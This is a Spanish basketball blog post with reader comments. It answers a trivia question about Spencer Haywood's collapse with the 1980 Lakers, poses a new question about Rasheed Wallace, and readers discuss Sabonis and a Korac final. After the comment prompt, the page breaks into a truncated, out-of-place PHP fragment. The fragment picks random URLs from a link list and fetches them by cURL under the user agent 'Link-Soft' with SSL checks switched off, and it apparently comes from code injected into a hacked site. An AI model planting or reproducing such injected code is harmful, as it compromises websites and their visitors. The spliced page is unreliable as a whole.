Trivial #11: Spencer Haywood, el ala-pívot perdido

09 de October de 2009 por TheDeerHunter

Costó pero al final lo conseguisteis. Descubristéis, gracias a las numerosas pistas y a pesar del lapsus, la identidad del jugador secreto. Efectivamente, como bien apuntaron Daniel y Kantonyo, el jugador que buscábamos era Spencer Haywood, uno de esos jugadores con una historia digna de ser contada.

Todos conocemos el célebre 6º partido de las finales de 1980, cuando el entonces rookie Magic Johnson, excelso base como todos sabemos, substituyó como pívot titular a un Kareem Abdul-Jabbar lesionado del tobillo. Lo que pasó después forma ya parte de la inmensa mitología de la NBA. Magic jugó aquel día de lo que le dio la gana, lo de pívot fue meramente nominal. De todas formas, el suceso siempre me llamó especialmente la atención. No sé, no dejo de imaginarme (por poner un ejemplo) que mañana el Barcelona jugara una final de Champions y Valdés se lesionara el día de antes. Imaginad que a Guardiola se le ocurriera poner a Messi de portero a pesar de disponer de Jorquera ¿Cómo se le quedaría el cuerpo a este último? ¿Qué revuelo se armaría?

Siempre me pregunté qué fue de los hombres interiores de los Lakers de 1980. Los que se quedaron a la sombra de aquella gran hazaña. El hombre que estaba llamado a sustituir a Kareem Abdul Jabbar en aquel partido, por categoría, era Spencer Haywood. A muchos este nombre no les sonará de nada pero este jugador tuvo en sus manos pertenecer al olimpo de los dioses del baloncesto, ya que era un ala-pívot de potencial similar a Karl Malone o Elvin Hayes. Palabras mayores. Su número 24, retirado por los Sonics, tiene historia de la buena. Llegó a la liga muy joven, saltando del instituto a la ABA, y de la ABA a la NBA en cuestión de dos años. En su primera temporada en la NBA y a la edad de 21 años promedió 20 puntos y 12 rebotes. Su gran victoria, sin embargo, fue en los juzgados, ganándole la partida a la misma NBA que pretendía evitar que los jugadores se saltaran la universidad. Un proscrito desde el principio.

Tras Seattle se fue a New York, donde es célebre la relación que tuvo con la antigua top-model Iman y por desgracia fue entonces también cuando comenzó a coquetear con el crack y la cocaína.

La historia llega a nuestro punto de interés en el fatídico trade que pidió Westhead en 1980, largando al mismísimo Dantley para incorporar a Haywood a los Lakers. El tipo llegó ya muy intoxicado y desde el principio se dedicó a crear problemas de todo tipo. Lo mejor que hizo en L.A. fue agitar la toalla en el banquillo, en plan animador. Sobra decir que a Westhead no le hacía demasiada gracia su bajo rendimiento y tampoco se esforzaba demasiado dándole minutos, menos aún cuando gente como Jim Chones o Lansberger sí trabajaban para merecérselos.

Todo termina en la final contra los Sixers. Durante la sesión de vídeo del primer partido el señor Haywood se queda dormido… y no contento con su hazaña se soba también en la mismísima rueda de calentamiento. Tumbado en medio de la cancha ante el asombro de los asistentes. Durante el 2º partido se pelea en el vestuario con el propio Chones y para colmo el equipo pierde. Westhead no espera más y le aparta definitivamente del equipo.

Lo cierto es que no tenía tantas alternativas cuando se lesionó Kareem. Así se entiende mejor la historia de Magic.

Por si a alguien le interesa saber más, en su libro “Spencer Haywood: The Rise, the fall, the recovery” el propio jugador cuenta la historia del plan de asesinato que explicaba perfectamente Daniel en los comentarios.

Vámonos a por la siguiente pregunta, seguramente mucho más fácil que la anterior:

En el tiempo muerto de un partido, Rasheed Wallace lanzó una toalla a la cara de un compañero, hecho que le provocó ser sancionado con un partido de sanción. ¿Qué equipo escogió en el draft a la víctima del desacato?

Comenta

9 comentarios a esta entrada

  1. sergio dice:
    #1

    arvydas sabonis? portland trail blazers

      Citar

  2. sergio dice:
    #2

    no se la tiro tambien al entrenador Dunleavy? ese no fue jugador desde luego…

      Citar

  3. sergio dice:
    #3

    En cuanto a el señorito spencer haywood, desconocia por completo esta faceta suya tan…. tan. Recuerdo haber oido hablar de el como un gran jugador en sus años en seattle y tambien en la temporada del anillo de los Lakers antes de lo que pasó… He estado viviendo en Venecia unos meses y cuando hablaba con la gente de alli sobre basket me hablaban de un equipo con el y Dalipagic que supongo que seria la final de la que hablabas en europa… Gracias por culturizarme aun mas en este mundillo.. siempre se agradece

      Citar

  4. gabriel848 dice:
    #4

    creo que fue a Sabonis cuando jugaban ambos en los Blazzers
    y el equipo pues los Blazzers

      Citar

  5. Dantley2 dice:
    #5

    Aquí el Good Morning Vietnam, esa final la vi por TVE, no había otra cosa entonces. El comentarista era José Félix Pons, un futbolero sosete metido al basket, pero tenía ya de segundo a Pedro Barthe cuando era más salvaje. La final fue de la Korac, Joventut-Carrera de Venecia, y ya jugaba Villacampa jovencísimo y por supuesto algunos de los históricos de la Penya como Sagi-Vela, Margall, Santillana. La final fue emocionantísima, ganó el Joventut con una canasta faltando un segundo de un americano rubio que se llamaba … mmm, ahora vuelvo y le pregunto al tito Google ….

    ya, era Joe Galvin, pero lo que hace el paso del tiempo, no ganaron con esa canasta, sino que forzaron la prórroga.

    Y en ese partido estaba Haywood, en realidad el equipo eran Haywood y Dalipagic. Dalipagic era un escándalo de jugador, tremendo, de los más infravalorados quizá. Y Haywood era Haywood. En fin, que pedazo de final aquella, de las que marcaron época

      Citar

  6. Txusma dice:
    #6

    Técnicamente, de momento nadie ha contestado del todo correctamente la pregunta…

      Citar

  7. kantonyo dice:
    #7

    Técnicamente?? el equipo que escogió a Sabonis no fue Portland Trail BlazerS?

      Citar

  8. kantonyo dice:
    #8

    Anda!! ahora que lo veo, en el año 1985, Sabonis fue elegido por Atlanta Hawks!!!

      Citar

  9. kantonyo dice:
    #9

    En el año 1985 fue escogido por Atlanta Hawks, pero por ser menos de 21 años, esa elección quedó en nada, siendo elegido en el año 1986 de nuevo, esta vez por Portland Trail Blazers.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>